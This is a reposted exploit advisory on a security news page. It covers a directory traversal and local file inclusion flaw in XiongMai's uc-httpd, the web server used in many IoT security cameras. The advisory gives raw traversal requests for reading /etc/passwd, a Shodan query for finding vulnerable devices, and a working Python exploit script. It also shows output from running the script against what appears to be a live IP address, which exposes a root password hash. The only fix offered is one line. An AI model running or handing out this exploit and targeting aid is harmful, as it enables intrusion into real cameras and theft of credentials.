首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XiongMai uc-http 1.0.0 Local File Inclusion / Directory Traversal
来源:insecurity.zone 作者:Insecurity 发布时间:2017-04-13  
           ______  ______   _____     ___   _____   _____   _____              
           | ___ \ | ___ \ |  _  |   |_  | |  ___| /  __ \ |_   _|             
           | |_/ / | |_/ / | | | |     | | | |__   | /  \/   | |               
           |  __/  |    /  | | | |     | | |  __|  | |       | |               
           | |     | |\ \  \ \_/ / /\__/ / | |___  | \__/\   | |               
           \_|     \_| \_|  \___/  \____/  \____/   \____/   \_/               
                                                                               
                                                                               
 _____   _   _   _____   _____   _____   _   _  ______   _____   _____  __   __
|_   _| | \ | | /  ___| |  ___| /  __ \ | | | | | ___ \ |_   _| |_   _| \ \ / /
  | |   |  \| | \ `--.  | |__   | /  \/ | | | | | |_/ /   | |     | |    \ V / 
  | |   | . ` |  `--. \ |  __|  | |     | | | | |    /    | |     | |     \ /  
 _| |_  | |\  | /\__/ / | |___  | \__/\ | |_| | | |\ \   _| |_    | |     | |  
 \___/  \_| \_/ \____/  \____/   \____/  \___/  \_| \_|  \___/    \_/     \_/  
                                                                               

       [+]---------------------------------------------------------[+]
        | Vulnerable Software:      uc-httpd                        |
        | Vendor:                   XiongMai Technologies           |
        | Vulnerability Type:       LFI, Directory Traversal        |
        | Date Released:            03/04/2017                      |
        | Released by:              keksec                          |
       [+]---------------------------------------------------------[+]

uc-httpd is a HTTP daemon used by a wide array of IoT devices (primarily security cameras) which is vulnerable
to local file inclusion and directory traversal bugs. There are a few million total vulnerable devices, with
around one million vulnerable surviellence cameras. 

The following request can be made to display the contents of the 'passwd' file:
 GET ../../../../../etc/passwd HTTP/1.0

To display a directory listing, the following request can be made:
 GET ../../../../../var/www/html/ HTTP/1.0
The above request would output the contents of the webroot directory as if 'ls' command was executed

The following shodan request can be used to display vulnerable systems:
product:uc-httpd

Here is a proof of concept (written by @sxcurity): 
-------------------------------------------------------------------------------------------------------------
#!/usr/bin/env python
import urllib2, httplib, sys

httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0'

print "[+] uc-httpd 0day exploiter [+]"
print "[+] usage: python " + __file__ + " http://<target_ip>" 

host = sys.argv[1] 
fd = raw_input('[+] File or Directory: ')

print "Exploiting....."
print '\n'
print urllib2.urlopen(host + '/../../../../..' + fd).read()
-------------------------------------------------------------------------------------------------------------

Here is a live example of the exploit being ran:


root@127:~/dongs# python pwn.py http://114.32.123.46
[+] uc-httpd 0day exploiter [+]
[+] usage: python pwn.py http://<target_ip>
[+] File or Directory: /etc/passwd
Exploiting.....


root:absxcfbgXtb3o:0:0:root:/:/bin/sh

root@127:~/dongs# python pwn.py http://114.32.123.46
[+] uc-httpd 0day exploiter [+]
[+] usage: python pwn.py http://<target_ip>
[+] File or Directory: /proc/version
Exploiting.....


Linux version 3.0.8 (leixinyuan@localhost.localdomain) (gcc version 4.4.1 (Hisilicon_v100(gcc4.4-290+uclibc_0.9.32.1+eabi+linuxpthread)) ) #52 Fri Apr 22 12:33:57 CST 2016

root@127:~/dongs#
-------------------------------------------------------------------------------------------------------------


How to fix: Sanitize inputs, don't run your httpd as root!

       [+]---------------------------------------------------------[+]
        |                      CONTACT US:                          |
        |                                                           |
        | IRC:          irc.insecurity.zone (6667/6697) #insecurity |
        | Twitter:      @insecurity                                 |
        | Website:      insecurity.zone                             |
       [+]---------------------------------------------------------[+]


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Proxifier 2.19 Privilege Escal
·PCMAN FTP Server 2.0.7 ACCT Bu
·Apple WebKit - 'JSC::SymbolTab
·PCMAN FTP Server 2.0.7 GET Buf
·Apple WebKit - 'Document::adop
·PCMAN FTP Server 2.0.7 NLST Bu
·Apple WebKit - 'JSC::B3::Proce
·PCMAN FTP Server 2.0.7 MKD Buf
·Apple WebKit / Safari 10.0.3 (
·Adobe Creative Cloud Desktop A
·Apple WebKit / Safari 10.0.3 (
·Solaris 7 - 11 (x86 & SPARC) -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved